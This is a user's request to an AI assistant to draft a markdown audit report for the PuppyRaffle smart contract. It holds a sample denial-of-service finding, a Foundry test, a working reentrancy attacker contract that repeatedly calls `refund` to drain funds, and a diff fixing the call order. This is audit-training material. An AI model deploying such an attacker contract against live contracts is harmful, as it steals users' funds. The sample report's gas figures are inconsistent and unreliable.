--> This is the vulnerability in solidity:

        // Check for duplicates
        // @audit DoS 
        for (uint256 i = 0; i < players.length - 1; i++) {                         
            for (uint256 j = i + 1; j < players.length; j++) {                     
                require(players[i] != players[j], "PuppyRaffle: Duplicate player");
            }                                                                      
        }

--> This is the vulnerability report generated from the above vulnerability (this is an example done for you to take as a guide)

### [S-#] Looping through players array to check for duplicates in `PuppyRaffle::enterRaffle` is a potential denial of service (DoS) attack, incrementing gas cost for future entrants.

**Description** The `PuppyRaffle::enterRaffle` function loops through the `players` array to check for duplicates. However the longer the `PuppyRaffle::players` array is, the more checks a new player will have to make. This means the gas cost for players who enter right when the raffle starts will be dramatically lower than those who enter later. Every additional address in the `PuppyRaffle::players` array, is an additional check the loop will have to make.  

**Impact** The gas cost for raffle entrants will greatly increase as more players enter the raffle. Discouraging later users from entering, and causing a rush at the start of the raffle to be one of the first entrants in the queue.

An attacker might fill the raffle `PuppyRaffle::players` array so big, that no one else enters, guaranteeing themselves the win 

**Proof of concept**

If we have two sets of 100 players enter, the gas cost will be as such:
- 1st 100 players: ~6503275 gas 
- 2nd 1500 players: ~1057057316 gas 

This is more than 3x more expensive for the second 100 players.

<details>
<summary>PoC</summary>

Place the following test into `PuppyRaffleTest.t.sol`




</details>

**Recommended Mitigation** There are a few recommendations.

1. Consider allowing duplicates. Users can make new wallet addresses anyway, so a duplicate check doesn't prevent same person from entering multiple times, only the same wallet address. 
2. Consider a mapping to check for dupplicates. This would allow constant time lookup whether a user has already entered. You could have each raffle have a `uint256` id and the mapping would be a `raffleId` and a `player address` mapped to `true` or `false`.


Alternatively, you could use [OpenZeppelin's `EnumerableSet` library](https://docs.openzeppelin.com/contracts/4.x/api/utils#EnumerableSet).

--> This is another vulnerability found in a smart contract

         storage variable in a looping is gas inneficient
        // @audit - gas uint256 playerLength = players.length; 
        for (uint256 i = 0; i < players.length - 1; i++) {                         
            for (uint256 j = i + 1; j < players.length; j++) {                     
                require(players[i] != players[j], "PuppyRaffle: Duplicate player");
            }                                                                      
        }

--> I will put here part of proof of concept

    function test_reentrancyRefund() public {
        address[] memory players = new address[](4);
        players[0] = playerOne;
        players[1] = playerTwo;
        players[2] = playerThree;
        players[3] = playerFour;
        puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

        ReentrancyAttacker attackerContract = new ReentrancyAttacker(puppyRaffle);
        address attackUser = makeAddr("attackUser");
        vm.deal(attackUser, 1 ether); // to give attackUser some money

        uint256 startingAttackContractBalance = address(attackerContract).balance;
        uint256 startingContractBalance = address(puppyRaffle).balance;

        // Attack
        vm.prank(attackUser);
        attackerContract.attack{value: entranceFee}();

        console.log("starting attacker contract balance: ", startingAttackContractBalance);
        console.log("starting contract balance: ", startingContractBalance);

        console.log("ending attacker contract balance: ", address(attackerContract).balance);
        console.log("ending contract balance: ", address(puppyRaffle).balance);

    }

contract ReentrancyAttacker {
    PuppyRaffle puppyRaffle;
    uint256 entranceFee;
    uint256 attackerIndex;

    constructor(PuppyRaffle _puppyRaffle) {
        puppyRaffle = _puppyRaffle;
        entranceFee = puppyRaffle.entranceFee();
    }

    function attack() external payable {
        address[] memory players = new address[](1);
        players[0] = address(this);
        puppyRaffle.enterRaffle{value: entranceFee}(players);

        attackerIndex = puppyRaffle.getActivePlayerIndex(address(this));
        puppyRaffle.refund(attackerIndex);
    }

    function _stealMoney() internal {
        if ( address(puppyRaffle).balance < entranceFee) return;
        puppyRaffle.refund(attackerIndex);
    }

    fallback() external payable {
        _stealMoney();
    }

    receive() external payable{
        _stealMoney();
    }
}

--> and this is part of the mitigation that i want you to include in a diff block

    function refund(uint256 playerIndex) public {

        address playerAddress = players[playerIndex];
        require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
        require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

      -  payable(msg.sender).sendValue(entranceFee);

        players[playerIndex] = address(0);
        emit RaffleRefunded(playerAddress);

      +  payable(msg.sender).sendValue(entranceFee);

    }



--> I want you to help me in creating a report in markdown format of this second vulnerability, please guide yourself with the example done for you, please organizing this report it according the below format, complement it, improving writting style, correct grammar and spelling. 

### [S-#] TITLE (Root Cause + Impact)

**Description:**

**Impact:**

**Proof of Concept:**

**Recommended Mitigation**

Important help me putting this second report in three different markdown sections. 
In the first markdown section include: 
### [S-#] TITLE (Root Cause + Impact), 
**Description:** and 
**Impact:**, 

and in the second markdown section include just 
**Proof of Concept:** 

and in the third section include just 
**Recommended Mitigation** 
in a markdown format

so that I can copy and paste to integrate this in a bigger report that will include all the vulnerabilities, please do it for me, i beg you.

I will give you the contract name: PuppyRaffle.

so that when you make a reference to a variable or function you can prefix the name of the contract previous the variable or function or event etc. for example PuppyRaffle::<varable_function_event_etc>